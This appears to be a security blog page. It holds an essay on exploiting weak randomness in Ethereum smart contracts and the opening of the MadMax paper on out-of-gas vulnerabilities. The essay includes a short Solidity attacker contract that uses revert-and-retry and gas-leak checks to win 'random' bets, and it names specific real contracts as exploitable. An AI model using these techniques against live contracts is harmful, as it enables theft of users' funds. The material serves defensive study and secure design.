Happy hunting!

Bad Randomness is Even Dicier Than You Think

Co-written with Neville Grech

Bad Randomness

Trivial Exploits of Bad Randomness In Ethereum, and How To Do On-Chain Randomness (Reasonably) Well

Ethereum has been used as a platform for a variety of applications of financial interest. Several of these have a need for randomness — e.g., to implement a lottery, a competitive game, or crypto-collectibles. Unfortunately, writing a random number generator on a public blockchain is hard: computation needs to be deterministic, so that it can be replayed in a decentralized way, and all data that can serve as sources of randomness are also available to an attacker. Several exploits of bad randomness have been discussed exhaustively in the past. Next, we discuss near-trivial exploits of bad randomness, as well as ways to obtain true randomness in Ethereum.

We begin by showing how easy it often is to exploit bad randomness without complex machinery, such as being a miner or reproducing the attacked contract’s internal state. The key idea is to use information leaks inside a transaction to determine whether the outcome of a random trial favors the attacker: an intra-transaction information leak. This is, to our knowledge, a new flavor of attack. Even though it shares most elements of past attacks on randomness, it generalizes to more contracts and is more easily exploitable.

Before we discuss the interesting aspects of intra-transaction information leaks, a bit of background is useful.

Ethereum Randomness Practices and Threat Model

Much has been written on the topic of random number generation in Ethereum smart contracts. The Ethereum Yellow Paper itself suggests “[approximating randomness with] pseudo-random numbers by utilising data which is generally unknowable at the time of transacting. Such data might include the block’s hash, the blocks’s timestamp, and the block’s beneficiary address. In order to make it hard for malicious miners to control those values, one should use the BLOCKHASH operation in order to use hashes of the previous 256 blocks as pseudo-random numbers.

More recent excellent advice on anti-practices and hands-on demonstrations of good practices have helped raise the bar of random number generation in smart contracts, as have several high-profile contracts (e.g., CryptoKitties — more on that later), serving as prototypes. For instance, it is now well understood that the current block number (or contents, or gas price, or gas limit, or difficulty, or timestamp, or miner address) is not a source of randomness. These quantities can be read by any other transaction within the same mined block. Even worse, they can be manipulated if the attacker is also a miner.

Ethereum miners predict the future by inventing it. Furthermore, Ethereum, the distributed “world computer”, is much slower than a physical computer. Therefore, a miner can actively choose to invent a future (i.e., mine a block) whose “random” properties will yield a favorable outcome. In one extreme case, a miner can precompute several alternative “next blocks”, pick the one that favors him/her, and then invest in making this block the next one (e.g., by dedicating more compute power to mine more subsequent blocks).

Therefore, the current understanding of the threat model to pseudo-randomness focuses on the scenario where the attacker is a miner. Thorough, well-considered discussions often recommend avoiding randomness “[that uses] a blockhash, timestamp, or other miner-defined value.” A common guideline is that “BLOCKHASH can only be safely used for a random number if the total amount of value resting on the quality of that randomness is lower than what a miner earns by mining a single block.” (As we discuss at the end, this guideline can be both too conservative and too lax. The expected value of all bets in a single block should be used instead of the “total amount of value”.)

Even though the usual threat model considers the case of a miner, most of the block-related pseudo-random properties can be exploited a lot more easily. The interesting block-related properties of the EVM are (in Solidity syntax) block.coinbaseblock.difficultyblock.gaslimitblock.numberblock.timestamp, and blockhash. For all these, an attacker can get the same information as the victim contract by just having a transaction in the same block. (The blockhash value is only defined for the previous 256 blocks, the rest of the quantities are only defined for the current block. In both cases, all current-block transactions receive the same values for these quantities.) In this way, an attacker can replay the randomness computation of the attacked contract before deciding whether to take a random bet. Effectively the pattern becomes:

if (replicatedVictimConditionOutcome() == favorable)
   victim.tryMyLuck();

Possible? Yes. Easy? Not quite.

Although the attack just described seems trivial, in practice it requires sophistication. A typical generator of randomness in a contract is often not merely blockhash(block.number-1) or some other such block-relative quantity. Instead, a common pattern mixes a seed value with block-relative quantities — for instance:

function _getRandomNumber(uint _upper) private returns (uint) {
   _seed = uint(keccak256(_seed, 
                          block.blockhash(block.number — 1),
                          block.coinbase, 
                          block.difficulty));
   return _seed % _upper;
}

This does not make the contract less vulnerable, in principle. There is no secret in the blockchain, so even a private _seed variable can be read. But in practice this can make the attack significantly harder. A contract with several users and intense activity will see its private seed modified often enough to be much less predictable. The attacker either needs (again) to be a miner, or needs to somehow coordinate receiving non-stale external information before the attack transaction. A very interesting illustration of both kinds of attacks (both as a miner and as a transaction with external information) shows how they are possible but not before admitting: “So much for a simple solution.

It’s Easier to Ask For Forgiveness Than to Get Permission

Yet, there is a very simple, non-miner attack that has guaranteed success, even with fast-changing private seeds. The transactional model of Ethereum computation together with the public nature of all stored information make exploitation of bad random number generators near-trivial.

The general pattern is simple. All a contract needs to do to be vulnerable is to finalize in a single transaction (typically before the end of a public call) an outcome that possibly favors the attacker. (This outcome may be determined through any technique producing entropy, including hashing of past blocks, reading the current block number, etc.) The attacker simply executes code such as:

victim.tryMyLuck();
require(victim.conditionOutcome() == favorable);

In other words, the attacker can choose to commit a transaction only when the outcome of a “random” trial is favorable, and abort otherwise. The only cost in the latter case is minor: the gas spent to execute the transaction. The attack works even if there is value transfer in the tryMyLuck() trial: if the transaction aborts, its effects are reverted.

In this transaction-revert-and-retry approach, the attacker turns the code of the victim contract against itself! There is no need to emulate the victim’s randomness calculation, only to check if the result is favorable. This is information that’s typically publicly accessible, or easy for the attacker to leak out of the victim (e.g., via gas computations, as we will discuss later).

Practical Examples

There are several examples of (already with past techniques) vulnerable contracts that can be attacked more easily in the way we describe. For a vivid illustration, consider the (defunct?) CryptoPuppies Dapp. CryptoPuppies attempted to build on the CryptoKitties code base and add “rarity assessments for puppies determined by the average between initial CryptoPuppy attributes (Strength + Agility + Intelligence + Speed) / 4”. The code for the contract, however, adds (to the otherwise solid CryptoKitties contract code) a bad random number generator, combining a seed and block properties (including block.blockhash(block.number-1)block.coinbaseblock.difficulty). Furthermore, the result is readily queryable: anyone can read the attributes of a generated puppy. It is trivial for an attacker to try to breed a puppy with the desired attributes and to abort the transaction if the result is not favorable.

In other cases of vulnerable contracts, an attacker can determine a favorable outcome of a battle between dragons and knights, create pets only when they have desired features, set the damage inflicted by heros or monsters, win a coin toss, and more.

(All contract examples are collected via analysis queries on the bytecode of the entire contents of the blockchain and inspected in source or via our alpha-version decompiler at contract-library.com.)

Hiding State Does Little To Help

The benefit of the attack pattern that cancels the transaction based on outcome is that the outcome of an Ethereum computation is easy to ascertain. In most cases, the vulnerable contract exposes publicly the outcome of a “random” trial. Even when not (i.e., when the outcome of the trial is kept in private storage only) it is easy to have an intra-transaction information leak. Perhaps the most powerful technique for leaking information (regarding what a computation did) is by measuring the gas consumption of different execution paths. Given the widely different gas costs of distinct instructions, this technique is often a reliable way of determining randomness outcomes.

For illustration, consider a rudimentary vulnerable contract:

contract Victim {
   mapping (address => uint32) winners;
    … 
   function draw(uint256 betGuess) public payable {
     require (msg.value >= 1 ether);
     uint16 outcome = badRandom(betGuess);
     if (winning(outcome))
       winners[msg.sender] = outcome;
   }
 }

The contract performs an extra store in the case of a winning outcome. The attacker can trivially exploit this to leak information about the outcome, before the transaction even completes:

contract Attacker {
   function test() public payable {
     Victim v = Victim(address(<address of victim>));
     v.draw.value(msg.value)(block.number); // or any guess
     require (gasleft() < 253000); // or any number that will
                                   // distinguish an extra store
                                   // relative to the original gas
   }
 }

So, What Can One Do? The Blockhash Minus-256 Problem

We saw some of the pitfalls of bad randomness on Ethereum, but what can one do to produce truly random numbers? A standard recommendation is to go off-chain and employ external sources. These are typically either an outside “oracle” service (e.g., Oraclize), or hashed inputs by multiple users with competitive interests. Both solutions have their drawbacks: the former relies on external trust, while the latter is only applicable in specific usage scenarios and may require as much care as designing nearly any cryptographic protocol. Furthermore, the issue with randomness on Ethereum is not the entropy of the bits — after all, there are excellent sources of entropy on the blockchain, yet they are predictable. Therefore, in principle, even external solutions may be vulnerable to transaction-revert-and-retry attacks, if they have not been carefully coded.

Although off-chain solutions have great merit, an interesting question is what one can do to produce random numbers entirely on-chain. There are certainly limitations to such randomness, but it is also quite possible, under strict qualifications. The best recommendation is to use the blockhash of a “future” block, i.e., a block not-yet-known at the time a bet is placed. For instance, a good protocol (formulating a random trial as a “bet”) is the following:

  • accept a bet, with payment, register the block number of the bet transaction
  • in a later transaction, compute the blockhash of the earlier-registered block number, and use it to determine the success of the bet.

The key to the approach is that the hash used for randomness is not known at bet placement time, yet cannot change on future trials. The approach still has limitations in the randomness it can yield, because of miners, who can predict the future (at a cost). We analyze these limitations in the next section, where we collect all randomness qualifications in a single place. Before that, however, we need to consider another caveat of the approach. As mentioned earlier, the blockhash function is only defined for the previous 256 blocks. (In the non-immediate future, EIP-210 aims to change this.) Therefore, if the second step of the above protocol is performed too late (>256 blocks later) or too early (in the same transaction as the first step), the result (zero) of blockhash will be known to an attacker.

Therefore, any protocol using blockhash of “future” blocks needs to integrate extra assumptions. The most practical ones seem to be:

  • the bettor has to not only place the bet but also invoke the contract in a future transaction (within the next 256 blocks) to determine the outcome
  • if the bettor is too late (or too early) the outcome should favor the contract, not a potential attacker.

Some smart contracts have attempted to circumvent the need for the second step with solutions that may be acceptable in context. A good example is the randomizer in the CryptoKitties GeneScience contract. (This contract seems to have no publicly available source code, unlike the CryptoKitties front-end contract, so we examine its decompiled intermediate-language version.) In function mixGenes, one can see code of the form:

v22b_a = block.blockhash(varg2);
if (!v22b_a) {
  v22b_c = ((block.number & -0x100) + (varg2 & 0xff));
  if ((v22b_c >= block.number)) {
    v22b_c = v22b_c — 256;
  }
  v22b_a = block.blockhash(v22b_c);
}

That is, if the block number of the bet is older than 256 blocks back (i.e., blockhash returns zero) the current block number’s high bits are merged with the older block’s lower bits, possibly with 256 subtracted, so as to produce a block number within the 256 most recent, whose blockhash is taken.

Such code can be well exploited with the transaction-revert-and-retry approach. The benefit of hashing an unknown-at-betting-time block is lost, instead sampling a predictable quantity, whose outcome may vary upon a retry. However, retries will yield different values only every 256 blocks — once the high bits of the block number change. In the specific context of the application (where other players can breed the same crypto-kitty) this risk is probably acceptable.

Putting it All Together

Based on the above, let us consider an end-to-end recommendation for purely-on-chain randomness. Computing the blockhash of a “future” block is a pattern that can yield truly unknown bits to the current transaction, but is still vulnerable to miners: a miner can place a bet, then mine more than one version of the “future” block. Therefore, for safe use of blockhash, the expected value of the random trial for an attacker should be lower than the reward of mining a block: an attacker should never benefit from throwing away non-winning blocks. Note that this expected value may be much lower than the total stakes riding on the randomness. For instance, a bet awarding 1000 ETH with probability 1/1000 is still only worth 1ETH to an attacker. Such randomness could, therefore, be quite practical for many applications.

However, in computing the expected value of a random trial it is important to remember that bets are compounding. If a single block contains N bets (e.g., in N independent transactions, which could be by the same attacker), each for 1000ETH, and each with 1/1000 probability, the expected value of the block for the attacker is N ETH. This reasoning can be used to bound the maximum number of bets accepted in the same transaction. Unfortunately, a single contract cannot know what other bets are taken by other contracts’ transactions in a single block, and an attacker could well be targeting multiple contracts to compound bets. Therefore, the estimate will be either approximate, or too conservative, yielding very low expected values per bet. Even worse, a badly-coded contract can incentivize attackers to violate the randomness of an unrelated contract, at least temporarily. The attacker/miner has an incentive in exploiting the badly-coded, vulnerable contract, and an extra opportunity to also take bets against a contract that wouldn’t be profitable on its own. (The attacker may not be able to exploit the weaker contract more, e.g., because it has limits in the bets per block, but can fit in more transactions in the same block.) Still, such an attack is only valid until the badly-coded contract is depleted.

A back-of-the-envelope calculation of pessimistic values with the current block mining reward (3ETH) and block gas limit (8 million) suggests that an expected value of an individual bet at under 3.75E-7 ETH-per-unit-of-gas is safe for steady-state use, even if temporarily vulnerable (until depletion of other contracts). For instance, a transaction consuming 100,000 gas should result in bets with expected return at most 0.0375 ETH. (If the block was filled with such transactions, it would still be unprofitable for an attacker-miner to throw it away.) This is currently around 50x the gas cost of such a transaction, so the bet value is not unrealistically low for real applications. Again, this does not limit the payoff of the bet but the expected return. The successful bet could result in 1M ETH, but if this only happens with probability 1/27,000,000, the expected bet value is under 0.0375 ETH.

More generally, such reasoning motivates an interesting practice that we have not seen adopted so far: to make bets consume gas proportionately to their expected value. For instance, a bet with a high expected value, e.g., of 2 ETH, should be perfectly possible but should require gas nearly equal to the block gas limit (i.e., the caller should know to supply the gas and the bet contract should consume it via extra computation), so that virtually no other transactions can be part of the same block.

[Standard caveat: all analysis assumes an attacker is incentivized only to maximize his/her profit in ETH (or tokens) based on smart contract execution. There may be attack models not considered, although most conventional attacks (e.g., double spending through chain reorg) don’t seem to benefit from throwing away a block. However, notably, the assumption does not apply to an attacker willing to lose ETH to perpetrate an attack (e.g., in order to cause damages to the victim, or to disrupt the ecosystem in order to manipulate ETH exchange rates, or …). Such attack conditions are a topic for a different post, but much of Ethereum is vulnerable to such attacks.]

To summarize, our recommendation for on-chain random number generation is to follow a pattern such as:

  • Accept a bet, with payment, register the block number of the bet transaction.
  • The bettor has to not only place the bet but also invoke the contract in a future transaction (within the next 256 blocks). The contract will compute the blockhash of the earlier-registered block number, and use it to determine the success of the bet.
  • If the bettor is too late (or too early) the outcome should favor the contract, not a potential attacker.
  • The expected value of the random trial for all bets in a single block should be lower than the reward for mining a block. (You should convince yourself that this calculation works in your favor.)

This approach has the disadvantages of a delay until a bet outcome is revealed, of requiring a second transaction, and of placing severe limits on the expected value of the bet. It is, however, otherwise the only known quasi-acceptable technique for purely-on-chain randomness.

Madmax: Surviving Out-of-gas Conditions in Ethereum Smart Contracts

Ethereum is a distributed blockchain platform, serving as an ecosystem for smart contracts: full-fledged inter- communicating programs that capture the transaction logic of an account. Unlike programs in mainstream languages, a gas limit restricts the execution of an Ethereum smart contract: execution proceeds as long as gas is available. Thus, gas is a valuable resource that can be manipulated by an attacker to provoke unwanted behavior in a victim’s smart contract (e.g., wasting or blocking funds of said victim). Gas-focused vulnerabilities exploit undesired behavior when a contract (directly or through other interacting contracts) runs out of gas. Such vulnerabilities are among the hardest for programmers to protect against, as out-of-gas behavior may be uncommon in non-attack scenarios and reasoning about it is far from trivial.

In this paper, we classify and identify gas-focused vulnerabilities, and present MadMax: a static program analysis technique to automatically detect gas-focused vulnerabilities with very high confidence. Our approach combines a control-flow-analysis-based decompiler and declarative program-structure queries. The combined analysis captures high-level domain-specific concepts (such as łdynamic data structure storagež and łsafely resumable loopsž) and achieves high precision and scalability. MadMax analyzes the entirety of smart contracts in the Ethereum blockchain in just 10 hours (with decompilation timeouts in 8% of the cases) and flags contracts with a (highly volatile) monetary value of over $2.8B as vulnerable. Manual inspection of a sample of flagged contracts shows that 81% of the sampled warnings do indeed lead to vulnerabilities, which we report on in our experiment.

1 INTRODUCTION

Ethereum is a decentralized blockchain platform that can execute arbitrarily-expressive compu- tational smart contracts. Developers typically write smart contracts in a high-level language that a compiler translates into immutable low-level EVM bytecode for a persistent distributed virtual machine. Smart contracts handle transactions in Ether, a cryptocurrency with a current market

capitalization in the tens of billions of dollars. Smart contracts (as opposed to non-computational łwalletsž) hold a considerable portion of the total Ether available in circulation, which makes them ripe targets for attackers. Hence, developers and auditors have a strong incentive to make extensive use of various tools and programming techniques that minimize the risk of their contract being

attacked.
Analysis and verification of smart contracts is, therefore, a high-value task, possibly more so

than in any other programming setting. The combination of monetary value and public availability makes the early detection of vulnerabilities a task of paramount importance. (Detection may occur after contract deployment. Despite the code immutability, which prevents bug fixes, discovering a vulnerability before an attacker may exploit it could enable a trusted party to move vulnerable funds to safety.)

A broad family of contract vulnerabilities concerns out-of-gas behavior. Gas is the fuel of com- putation in Ethereum. Due to the massively replicated execution platform, wasting the resources of others is prevented by charging users for running a contract. Each executed instruction costs gas, which is traded with the Ether cryptocurrency. Since a user pays gas upfront, a transaction’s computation may exceed its allotted amount of gas. As a consequence, the Ethereum Virtual Machine (EVM) raises an out-of-gas exception and aborts the transaction. A contract that does not correctly handle the possible abortion of a transaction, is at risk for a gas-focused vulnerability. Typically, a vulnerable smart contract will be blocked forever due to the incorrect handling of out-of-gas conditions: re-executing the contract’s function will fail to make progress, re-yielding out-of-gas exceptions, indefinitely. Thus, a contract is susceptible to, effectively, denial-of-service attacks, locking its balance away.

In this work, we present MadMax1: a static program analysis framework for detecting gas-focused vulnerabilities in smart contracts. MadMax is a static analysis pipeline consisting of a decompiler (from low-level EVM bytecode to a structured intermediate language) and a logic-based analysis specification producing a high-level program model. MadMax is highly efficient and effective: it analyzes the whole Ethereum blockchain in 10 hours and reports numerous vulnerable contracts holding a total value exceeding $2.8B, with high precision, as determined from a random sample.

MadMax is unique in the landscape of smart contract analyzers and verifiers. (Section 7 contains a more detailed treatment of related work.) It is an approach employing cutting-edge static program analysis techniques (e.g., data-flow analysis together with context-sensitive flow analysis and memory layout modeling for data structures), whereas past analyzers have primarily focused on symbolic execution or full-fledged verification for functional correctness. As MadMax demonstrates, static program analysis offers a unique combination of advantages: very high scalability, universal applicability, and high coverage of potential vulnerabilities.

We speculate that past approaches have not employed static analysis techniques due to three main reasons: a) the belief that the thoroughness of static analysis is unnecessary for smart contracts since they are small in size; b) the possibility that static analysis, although thorough, can yield a high number of false positivesÐfull-fledged, less automated verification techniques may be necessary; and c) the difficulty of applying static analysis techniques uniformly, at a low level: decompiling the low-level EVM bytecode into a manageable representation is a non-trivial challenge.

MadMax addresses or disproves these objections. It provides an effective decompilation substrate for analyzing low-level EVM bytecode. MadMax exhibits high precision, due to the sophisticated modeling of the gas-focused concepts it examines. Finally, our study of the Ethereum blockchain (and the subsequent application of MadMax to it) reveals that smart contracts can significantly benefit from static analysis. Figure 1 gives an early indication, by plotting smart contract size against the Ether held. We can see that relatively complex contracts (measured in the number of basic blocks) contain most of the Ether. Hence, the potential risk compounds for sophisticated smart contracts because complex contracts are harder to get right. This observation strongly supports the use of static program analysis, which scales well to relatively complex programs.

The main contributions of our work are:

●  Validation: We validate the approach for all 6.3 million contracts deployed on the entire blockchain. To our knowledge, no other work in the smart contract security literature has performed program analysis on such a number of contracts. Our analysis does not require source code to run, nor external input, and at the same time is highly scalable. The analysis reports vulnerabilities for contracts holding a total value of over $2.8B. Even though it is uncertain whether most vulnerabilities are real and how easily exploitable they might be, manual inspection of a small sample reveals over 80% precision and the existence of specific issues, which we detail.

●  A decompiler from EVM bytecode to structured low-level IR: We propose the use of static program analysis directly on the EVM bytecode. Analyzing EVM bytecode is challenging due to the stack-based low-level nature of the EVM with minimal control-flow structures.

●  The identification of gas-focused vulnerabilities: The semantics of limited, gas-based execution on top of smart contracts handling monetary transactions introduces a new class of vulnerabilities that does not occur in other programming language paradigms. We identify out-of-gas vulnerabilities thoroughly and explain their essence.

●  Abstractions for high-level data-structures and program constructs: We construct high-level abstractions for EVM bytecode for bridging the gap between the low-level EVM and the high-level vulnerabilities. We express analysis concepts that include safely resumable loops, data structures whose size increases in repeat invocations of public functions, and recognition of nested dynamic structures in low-level memory.

Read more